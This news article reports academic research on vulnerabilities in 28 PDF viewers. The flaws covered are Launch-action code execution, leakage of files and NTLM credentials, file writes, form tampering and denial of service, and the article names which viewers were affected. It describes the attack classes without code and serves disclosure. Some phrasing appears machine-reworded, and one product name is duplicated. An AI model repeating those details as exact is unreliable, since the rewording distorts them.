Security researchers document their exploits in picking apart dozens of PDF software brands
The overwhelming majority of the foremost popular Windows-native PDF viewers were susceptible to multiple attack techniques exploiting standard PDF features, a team of security researchers has discovered.
Several PDF software brands were vulnerable to the most serious attacks, which resulted in local file leakage, file write access, and remote code execution (RCE), academics from Ruhr University Bochum in Germany found.
PDF viewers built into leading web browsers and applications for macOS and Linux were only vulnerable to comparatively trivial attacks like denial of service (DoS).
The viewers incorporated into Safari and Edge, meanwhile, were the sole applications among 28 tested to resist all exploits, which targeted features that “directly or indirectly allow access to a file handle”, as a blog post explains.
Susceptible to eight of 10 attack techniques, the worst culprits overall were PDF-Xchange Viewer and PDF-Xchange Viewer for Windows.
PDFelement and iSkysoft, prone only to DoS, were honorable exceptions to the otherwise unimpressive Windows scorecard.
Code execution by design
“I was surprised what percentage viewers did straightforwardly implement ‘code execution by design’ – because they simply followed the PDF reference and thereby introduced a dangerous feature (the ‘Launch action’) without, [for example], correctly asking the user for confirmation,” Jens Müller, one of the researchers, told in an interview.
As a result, the blog post describes how a malicious file could successfully “be specified by a local path, a network share, a URL, or a file embedded within the PDF document itself” against six of 18 Windows viewers probed.
Information disclosure attacks, meanwhile, might be wont to track PDF document use “by silently invoking a connection to the attacker’s server once the file is opened, or to leak PDF document form data, local files, or NTLM credentials to the attacker”.
The most dangerous technique, successfully deployed against three Windows viewers and partially successful against another three, exploited various methods defined by the PDF standard for embedding external files or accessing files on the host’s file system.
“If a malicious document managed to firstly read files from the victim’s disk and secondly, send them back to the attacker, such behavior would arguably be critical,” reads the blog post.
Data manipulation attacks
Data manipulation attacks involve silently modifying form data, displaying different content depending on the application used to open the document, and exploiting ambiguity in how the PDF standard allows form data submission to external web servers so as to write down to local files on the host’s filing system .
Attackers successfully executed one or both DoS techniques against every single application, bar the Safari and Edge viewers. This included exploiting how document elements reference themselves and other similar elements to cause an ‘infinite loop’, and a twist on the ‘zip bomb’ attack that compresses stream objects rather than zip files.
A better choice
Müller said the “more severe issues should be fixed by now”, while “less impactful issues like form modification are basically features”, and can therefore unlikely be remedied.
He suggests that applications built into browsers, which supply sandboxing protections, “may be a far better choice for a suspicious document than a native third-party PDF viewer”.
The research also highlights an education gap around the risks posed by what Müller refers to as “a quite complex data format with tons of interesting features”.
“For example, people are aware that Office files (e.g in email attachments) can contain macros, but general knowledge of comparable functionality in PDF documents is a smaller amount widespread,” he noted.